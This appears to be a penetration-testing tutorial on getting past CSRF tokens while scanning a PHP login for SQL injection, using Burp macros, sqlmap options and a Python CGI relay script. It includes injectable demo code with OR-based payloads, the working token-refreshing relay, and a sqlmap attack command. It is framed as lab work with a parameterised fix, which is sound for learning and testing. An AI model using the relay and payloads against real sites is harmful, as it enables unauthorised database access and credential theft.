2025-02-24 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/02 Report
Many people are unfamiliar with how to use Python's CGIHTTPServer to get past a CSRF-token defence while testing for SQL injection. This article summarizes the problem and one solution.
Preface
A CSRF token is a random value generated by the server. Its purpose is to prevent duplicate form submissions and request forgery. Because the value is random, single-use and tied to a previous request handled by the server, an attacker cannot realistically forge it.
Burp Suite
Not being able to forge the token does not mean we cannot work around it. Here I have to mention the web penetration workhorse, Burp Suite. Burp can be configured in several ways to use macros that bypass CSRF tokens on HTML forms: the macro fetches the form, extracts the current token and inserts it into each request sent by Burp Active Scan, Burp Intruder, Burp Repeater, or even Burp Proxy. Intruder alone offers the Grep - Extract option and the pitchfork attack type, which let you pull the token out of each response and feed it into the next request. If that is still not enough, Burp's extensibility lets you write your own extension.
Besides Burp, another staple, sqlmap, offers similar functionality: the --csrf-token and --csrf-url options name the token parameter and the page it is fetched from, so sqlmap refreshes the token before every request. Alternatively, as mentioned above, configure a Burp macro and run sqlmap through Burp with --proxy.
But today I want to introduce yet another way around it, using nothing more than Python's CGIHTTPServer.
Experimental environment
My test environment is a simple PHP + MySQL application with a login form and a restricted area. I uploaded the PHP code here so you can download and test it yourself. The code is not perfect, but it is good enough for testing.
The CSRF token is the SHA-256 hash of a randomly generated number, and a different one is issued for every HTTP request.
Consequently, unless Burp is configured specifically to refresh the token, every replayed request carries a stale token, is rejected before the query ever runs, and the vulnerability goes undetected.
The same is true of sqlmap.
I use the --technique, --dbms and -p options to speed up the scan. Since this is a simple boolean-based SQLi, --level 1 (the default) is enough. If you do not have valid credentials, however, you must set --risk to 3, because sqlmap only tries OR-based boolean-blind payloads at risk level 3. Those payloads are rated dangerous because they can make any condition true: when the injection sits in the WHERE clause of an UPDATE or DELETE statement, an OR-based payload affects every row, so an attacker could change users' passwords in the database, dump credentials, and so on.
Here I detected an OR-based SQLi using sqlmap's --csrf-token="mytoken" option:
This is a login form, so the statement behind it is obviously a SELECT, which means risk level 3 does no harm here.
Of course, if you have valid credentials, the form is also vulnerable to AND-based SQLi. But even with valid credentials I would test with a different (valid) user name and look for the OR-based SQLi first: that way the account does not get locked out by failed logins.
Also using sqlmap's --csrf-token="mytoken" option, I detected an AND-based SQLi:
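The difference between the OR-based and AND-based findings above is easier to see against a concrete query. The following is an added example, not the article's PHP test application: an in-memory SQLite stand-in for the vulnerable login query (table and column names are assumed). It shows why an OR-based boolean-blind payload in the last field of the WHERE clause succeeds with no valid credentials, why an AND-based payload only yields a true/false difference when the credentials are right, why the same OR payload in a DELETE wipes every row (the reason sqlmap rates it risk 3), and the parameterised query that closes the hole.

```python
# Added example: SQLite stand-in for the article's vulnerable PHP login.
# Table/column names (users, sessions, username, password) are assumptions.
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("CREATE TABLE sessions (id INTEGER, username TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "secret"), ("bob", "hunter2")])
    db.executemany("INSERT INTO sessions VALUES (?, ?)",
                   [(1, "admin"), (2, "bob"), (3, "bob")])
    return db


def vulnerable_login(db, username, password):
    """Deliberately injectable, like the PHP under test: the values are
    concatenated into the SQL. Returns True when the WHERE clause matches."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return db.execute(sql).fetchone() is not None


def vulnerable_logout(db, username):
    """The same flaw in a DELETE. Returns the number of sessions left, so the
    effect of an OR-based payload ('every row matches') is visible."""
    db.execute("DELETE FROM sessions WHERE username = '%s'" % username)
    return db.execute("SELECT COUNT(*) FROM sessions").fetchone()[0]


def safe_login(db, username, password):
    """Parameterised form: the payload is bound as data and never parsed as SQL."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    # OR-based payload in the password field: no credentials needed.
    print(vulnerable_login(db, "nobody", "' OR 1=1 AND 'a'='a"))   # True
    # AND-based payload: only distinguishes 1=1 from 1=2 with a valid password.
    print(vulnerable_login(db, "admin", "wrong' AND 1=1 AND 'a'='a"))  # False
    print(vulnerable_logout(make_db(), "bob' OR 1=1 AND 'a'='a"))  # 0 sessions left
```

The payload shapes mirror sqlmap's boolean-blind style (a closing quote, the condition, then `AND 'a'='a` to re-balance the quotes rather than a trailing comment), so the rest of the original WHERE clause stays in play exactly as it does in the real scan.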
CGIHTTPServer
First, let's create a CGI script:
The script lives in the folder_whatever/cgi-bin/ directory. Call it mask.py and make sure it is executable. Then, from the folder_whatever directory, run "python -m CGIHTTPServer" (on Python 3 the equivalent is "python3 -m http.server --cgi"). By default it listens on port 8000/tcp.
You can test it with the correct password:
And use an incorrect password:
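The article's own script is not reproduced in this copy. As an added example that is not the author's code, here is a Python 3 CGI relay in the same spirit, with a stand-in for the target so it can be exercised offline. The target URL, the form field names (username, password, token) and the markup of the hidden token field are assumptions; the regex expects the SHA-256 hex token the article describes. Every request to the script performs one GET to obtain a fresh token, then one POST with the caller's username and password plus that token, using a single cookie jar so the token stays bound to the PHP session that issued it. The scanner only ever talks to the relay and never needs to know a token exists.

```python
#!/usr/bin/env python3
# mask.py: CGI relay that fetches a fresh CSRF token from the target login
# page and resubmits the caller's username/password together with it.
# Added example, not the article's script; TARGET_LOGIN, the field names
# and TOKEN_RE are assumptions.  Run with: python3 -m http.server --cgi
# from the directory that contains cgi-bin/mask.py.
import http.cookiejar
import os
import re
import sys
import urllib.parse
import urllib.request

TARGET_LOGIN = "http://127.0.0.1/login.php"   # assumed target login page
# Assumed hidden field; the article's token is a SHA-256 hex digest (64 chars).
TOKEN_RE = re.compile(r'name="token"\s+value="([0-9a-f]{64})"')


def extract_token(html):
    """Pull the one-time token out of the login form markup."""
    m = TOKEN_RE.search(html)
    if not m:
        raise ValueError("no CSRF token found in login page")
    return m.group(1)


def encode_form(fields):
    """application/x-www-form-urlencoded body as bytes."""
    return urllib.parse.urlencode(fields).encode()


def relay_login(username, password, fetch):
    """fetch(url, data=None) -> response body (str). It must keep cookies
    across calls, because the token is tied to the session that issued it."""
    token = extract_token(fetch(TARGET_LOGIN))
    body = encode_form({"username": username, "password": password, "token": token})
    return fetch(TARGET_LOGIN, body)


def http_fetch():
    """Real fetcher: one cookie jar per CGI invocation (per scanner request)."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))

    def fetch(url, data=None):
        with opener.open(url, data=data, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return fetch


def parse_cgi_params(environ, body):
    """Accept the scanner's payload via GET query string or POST body.
    Uses urllib.parse instead of the deprecated cgi module."""
    if environ.get("REQUEST_METHOD") == "POST":
        raw = body.decode("utf-8", "replace")
    else:
        raw = environ.get("QUERY_STRING", "")
    params = urllib.parse.parse_qs(raw, keep_blank_values=True)
    return {k: v[0] for k, v in params.items()}


class FakeTarget:
    """Constructed stand-in for the PHP login page, for offline use only:
    a new token on every GET, and a POST with a stale or missing token is
    rejected before the credentials are even looked at."""
    def __init__(self):
        self.issued = None
        self.counter = 0

    def __call__(self, url, data=None):
        if data is None:
            self.counter += 1
            self.issued = "%064x" % self.counter
            return ('<form method="post"><input type="hidden" name="token" '
                    'value="%s"></form>' % self.issued)
        p = parse_cgi_params({"REQUEST_METHOD": "POST"}, data)
        if self.issued is None or p.get("token") != self.issued:
            return "Invalid CSRF token"
        self.issued = None   # single use
        if p.get("username") == "admin" and p.get("password") == "secret":
            return "Welcome admin"
        return "Invalid credentials"


def main():
    length = int(os.environ.get("CONTENT_LENGTH") or 0)
    body = sys.stdin.buffer.read(length) if length else b""
    params = parse_cgi_params(os.environ, body)
    sys.stdout.write("Content-Type: text/html\r\n\r\n")
    sys.stdout.write(relay_login(params.get("username", ""),
                                 params.get("password", ""), http_fetch()))


if __name__ == "__main__":
    if "GATEWAY_INTERFACE" in os.environ:   # set by http.server --cgi
        main()
    else:                                    # offline demo against the stand-in
        print(relay_login("admin", "secret", FakeTarget()))
```

With the server running, point the tools at the relay rather than the real form, for example (hypothetical invocation, the parameter under test is assumed): sqlmap -u "http://127.0.0.1:8000/cgi-bin/mask.py?username=admin&password=x" -p password --technique=B --dbms=mysql --risk=3. Because the relay returns the target's own response body, the boolean-based true/false pages sqlmap compares are exactly the ones the PHP application produced.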
Now sqlmap and Burp can be pointed at http://localhost:8000/cgi-bin/mask.py instead of the real login page: the script obtains a fresh token for every request it relays, so both tools detect the vulnerability without any CSRF-specific configuration.
That is how a small CGI script behind Python's CGIHTTPServer can stand in for a CSRF-token macro during injection testing.